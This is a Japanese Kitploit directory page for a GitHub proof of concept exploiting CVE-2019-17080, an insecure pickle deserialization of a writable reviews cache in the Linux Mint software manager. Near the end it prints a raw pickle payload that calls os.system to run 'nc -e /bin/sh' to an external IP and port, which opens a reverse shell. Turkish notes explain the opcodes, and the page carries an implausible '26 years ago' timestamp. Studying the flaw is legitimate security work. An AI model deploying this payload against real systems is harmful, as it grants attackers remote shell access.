Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
ツール/GitHubGitHub/materaj2/mintinstall-object-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用CTF学習と教育バイナリエクスプロイト
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

リポジトリを見る
26年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Linux Mint ソフトウェアマネージャ (v 7.9.5/9) は、誤った設定により、オブジェクトインジェクションと任意のコード実行を引き起こします。

root@kitploit:~
mintinsall

新しいコメントがある場合、new-reviews.list からダウンロードしてファイルに書き込みます。

root@kitploit:~
code mintinstall.py

ソフトウェアマネージャが最初に起動すると、reviews モジュールから ReviewCache() クラスを呼び出します。

データの処理方法

root@kitploit:~
code reviews.py

ReviewCache クラスが開始すると (init)、_load_cache() を呼び出します。

Load cache 関数は、REVIEWS_CACHE 変数内のファイルを読み取り、pickle モジュールを使用してファイル内のデータをアンシリアライズし、いくつかの値をメモリに保持します。

ファイルを確認すると、書き込み権限があるように見えます。

ツールをダウンロード

Pickle モジュールを使用してシリアライズ/アンシリアライズ操作を実行できるため、reduce メソッドを使用してモジュールを組み込み、任意のコードを実行できます。

ファイルをアンシリアライズしようとすると、悪意のあるコードが実行されます。

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text